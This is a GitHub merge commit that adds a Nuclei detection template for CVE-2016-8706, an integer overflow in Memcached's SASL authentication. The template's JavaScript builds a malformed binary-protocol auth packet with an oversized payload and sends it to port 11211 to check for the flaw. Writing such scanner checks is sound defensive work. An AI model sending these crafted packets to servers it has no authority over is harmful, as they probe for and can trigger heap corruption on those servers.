Merge pull request #8498 from projectdiscovery/pussycat0x-patch-5

Create CVE-2016-8706
projectdiscovery · Nov 20, 2023 · b33a7c1 · b33a7c1
2 parents 164c9ba + 1284477
commit b33a7c1
Showing 1 changed file with 44 additions and 0 deletions.
diff --git a/javascript/cves/2016/CVE-2016-8706.yaml b/javascript/cves/2016/CVE-2016-8706.yaml
@@ -0,0 +1,44 @@
+id: CVE-2016-8706
+
+info:
+  name: Memcached Server SASL Authentication - Remote Code Execution
+  author: pussycat0x
+  severity: high
+  description: |
+   An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
+  reference:
+    - https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-8706
+  metadata:
+    verfied: true
+  tags: cve,cve2016,rce,js,memcached
+
+javascript:
+  - code: |
+      let packet = bytes.NewBuffer();
+      packet.Write(new Uint8Array([0x80, 0x21]))
+      let cmd = 'stats'
+      packet.WriteString(cmd)
+      packet.Pack("!H", [32]);
+      packet.Pack("!I", [1]);
+      let buzz = Array(1000).fill("A").join('');
+      packet.WriteString(buzz)
+      const c = require("nuclei/net");
+      let conn = c.Open('tcp', `${Host}:${Port}`);
+      conn.SendHex(packet.Hex());
+      conn.RecvString();
+
+    args:
+      Host: "{{Host}}"
+      Port: 11211
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "Invalid arguments"
+
+      - type: word
+        words:
+          - "Auth failure"
+        negative: true